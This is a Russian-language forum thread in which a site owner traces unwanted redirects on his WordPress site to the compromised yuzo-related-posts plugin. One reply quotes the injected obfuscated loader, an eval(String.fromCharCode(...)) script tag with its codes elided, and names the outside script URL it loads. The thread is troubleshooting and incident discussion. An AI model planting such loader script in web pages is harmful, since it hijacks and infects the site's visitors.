Loading...
Свободное общение | Какой то kinonew
Fiery-HELL , Все лишние плагины удалил, кеши везде очистил, все проверил. не знаю откуда могла взяться переадресация. написал в тех.поддержку хостинга , может они что нибудь найдут
________
посл. ред. 26.05.2019 в 20:04; всего 1 раз(а); by IRONMAN
Вредоносный сайт - перенаправляет на CLICKJUMP какой то!
У же третий день не могу зайти на твой сайт
Kut32 (26.05.2019 в 20:31)
У же третий день не могу зайти на твой сайт

Я только сегодня заметил это, до сих пор у меня работал. Если что исправил, в одном плагине был оказывается вредоносный код
А ларчик просто открывался. Проблема решена. https://www.wordfence.com/blog/2019/04/yuzo-related-posts-ze...in-the-wild/

Статья на англ, включаем переводчики. все у кого wordpress удаляем из внутри плагин yuzo-related-posts.
[xrystalll] (26.05.2019 в 20:23)
IRONMAN , это что за скрипт?
<script type='text/javascript'>eval(String.fromCharCode(118,97, ... ,10,125));</script>
Если расшифровать то подгружается этот url https://letsmakesomechoice.com/come.js?dred=1123

Незнаю что за скрипт, проблема в плагине была который допустил вредоносный код, с марта этот плагин удален из репозитории wordpress, но я почему то только сейчас узнал про это...
________
посл. ред. 26.05.2019 в 20:47; всего 1 раз(а); by IRONMAN
Вот же из за чего трафик проседал у меня на сайте почти в половину..
IRONMAN , вот и славно
у вас запрос идет на разрешение отправки обычных Web Push уведомлений, а вы тут панику устроили... "вирусы-вирусы, нас атакуют а-а-а-а... вызывайте МЧС!"
CyberVit (26.05.2019 в 22:29)
у вас запрос идет на разрешение отправки обычных Web Push уведомлений, а вы тут панику устроили... "вирусы-вирусы, нас атакуют а-а-а-а... вызывайте МЧС!"

Это не обычный web push, не надо делать вывод незная всю суть проблемы. При заходе тупо сайт переадресововался на другой типа clickjump.biz, kinonew.pro и никак выйти не мог, адреса менялись. Я скинул ссылку, прочитайте и пойметечто это за проблема, точнее уязвимость в плагине.
________
посл. ред. 26.05.2019 в 23:07; всего 1 раз(а); by IRONMAN
Онлайн: 4
Время:
Gen. 0.0947
(c) Bym.Guru 2010-2026